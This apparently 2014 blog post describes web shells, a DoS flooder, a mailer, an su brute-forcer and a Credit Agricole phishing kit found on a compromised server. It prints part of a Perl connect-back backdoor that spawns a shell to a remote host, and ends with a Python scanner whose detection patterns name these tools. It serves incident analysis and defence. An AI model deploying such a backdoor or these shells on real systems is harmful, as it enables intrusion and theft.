Monday, January 13, 2014 - shells and DoS and phishing, oh my

Started with a WSO shell. Cracked into it.

Found all sorts of hideous junk on here, including a Credit Agricole (French bank) phishing kit:
WSO shell
ICH Th3 Unkn0wn MySQL interface
Priv8 shell
Symlink Sa 2 panel
Dangerous Mailer
VNShell DDoS shell
K2LL33d shell (a mod of the b374k shell)
RootDaBitch tool - brute forces local accounts using su
Credit Agricole kit

OK, let's have a look.

(this was something like the 3rd WSO I found in here...seriously??)

MySQL Interface mod

Priv8 Shell
It literally tells me the password to the shell is 'priv8'

..and the password works. What an ugly piece of garbage too!

Symlink Panel
Symlink shared hosting directories to one place and mass deface.

Domains list, but the symlinks aren't working. Sorry buddy.
This thing stopped being useful a while ago.

Dangerous Mailer
Login to mailer panel.

Long view of Dangerous Mailer

VNShell Flooder
(because DoS is hacking)
This is the type of stuff they teach you at HackForums.
Oh yeah, and this isn't even a shell, even though it's called a shell.

Select the attack type

Target, http file, attack time

Does it look like b374k shell (below)? 
Yes, that's because this skilled hacker just changed a few lines of code and called it his own work.
v3ry sw33t

If your eyes aren't already bleeding, get a load of this.

TurkBlackhats Shell

b374k shell (1923Turk)

This tool brute forces su to gain elevated privileges, uses suCrack.

Directory listing of the kit, showing Bash script, password txt and screenshots?

Oh yes, because I don't know how to run a bash script, nor would there be useful info in the script source code either...sigh.

Not one, but two screenshots!
This one proves that he got in !! Wow cool. Fuck you.
Thanks "The Breacher" that was really helpful to me and my fellow skids. 

(Shake my head)

More things that are not that interesting and pretty useless but someone decided to spend time working on anyway:

PHP mailer, no panel, post method
<?php
/* Form variables */
$nome = trim(@$_POST['nome']);           /* receives the data typed in the "nome" (name) field */
$email = trim(@$_POST['email']);         /* receives the data typed in the "email" field */
$assunto_user = trim(@$_POST['assunto']); /* receives the data typed in the "assunto" (subject) field */
$mensagem = trim(@$_POST['mensagem']);   /* receives the data typed in the "mensagem" (message) field */

Perl back connect
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
[...redacted]
  die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
  [...redacted]
  exec {'/bin/sh'} '-bash' . "\0" x 4;
  exit(0);
}
print "[*] Datached\n\n";

Last but not least.

Credit Agricole phishing kit -
Includes js, php, images, etc. for phishing site.
Bad guys redirect victim traffic to a kit like this in an effort to steal login credentials.
Crédit Agricole S.A. is the largest retail banking group in France, second largest in Europe and the eighth largest in the world by Tier 1 capital according to The Banker magazine. 
Phishing pages:

I deleted all of this junk. All the shells, phishing pages, mailers, the DoS 'shell'... all of it. I emailed the admins too. operacional[at]
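Added example, not code from this post or from any of the tools it describes: a small Python indicator scan over a web root that flags the strings the post itself exposes (WSO, b374k, priv8, Dangerous Mailer, the "Data Cha0s" connect-back banner, suCrack/RootDaBitch). The web root layout and the sample file contents in demo() are constructed; hits are leads for a human to review, not proof of compromise.

```python
#!/usr/bin/env python3
"""Indicator scan for the kind of junk found in this web root (added example)."""
import os
import re
import tempfile

# Each entry: (label, regex). Every string here is one the post above names.
SIGNATURES = [
    ("wso_shell", re.compile(r"\bWSO\b", re.I)),
    ("b374k_shell", re.compile(r"b374k", re.I)),
    ("priv8_shell", re.compile(r"\bpriv8\b", re.I)),
    ("dangerous_mailer", re.compile(r"Dangerous Mailer", re.I)),
    ("perl_connect_back", re.compile(r"Data Cha0s Connect Back|exec \{'/bin/sh'\}")),
    ("su_bruteforce", re.compile(r"suCrack|RootDaBitch", re.I)),
]

# Text-like extensions worth reading; binaries and images are skipped.
SCAN_EXTS = {".php", ".phtml", ".pl", ".cgi", ".sh", ".txt"}

def scan_text(text):
    """Return the sorted labels of every signature that matches text."""
    return sorted(label for label, rx in SIGNATURES if rx.search(text))

def scan_tree(root):
    """Walk root and map each flagged file (relative, '/'-separated) to its labels."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    labels = scan_text(fh.read())
            except OSError:
                continue  # unreadable file: skip, do not abort the whole scan
            if labels:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = labels
    return hits

def demo():
    """Build a constructed web root (one benign, two suspect files) and scan it."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {  # constructed sample contents, not real artifacts
        "index.php": "<?php echo 'hello'; ?>\n",
        "uploads/cb.pl": "#!/usr/bin/perl\nprint \"Data Cha0s Connect Back Backdoor\\n\";\n",
        "tmp/x.php": "<?php // b374k shell mod, password priv8 ?>\n",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_tree(root)

if __name__ == "__main__":
    for path, labels in sorted(demo().items()):
        print(f"{path}: {', '.join(labels)}")
```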
